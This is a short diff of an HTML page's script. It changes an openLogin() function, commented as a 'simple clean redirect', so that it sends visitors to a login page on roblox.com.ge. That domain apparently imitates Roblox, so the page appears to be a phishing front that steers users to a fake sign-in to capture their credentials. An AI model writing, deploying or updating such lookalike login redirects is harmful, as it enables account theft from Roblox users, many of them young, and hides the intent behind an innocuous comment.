--- a/index.html
+++ b/index.html
@@ -286,7 +286,7 @@
 
     // Simple clean redirect
     function openLogin() {
-      window.location.href = "https://roblox.com.ge/users/7597001363/profile";
+      window.location.href = "https://roblox.com.ge/login?returnUrl=1336618017952672";
     }
   </script>
 </body>
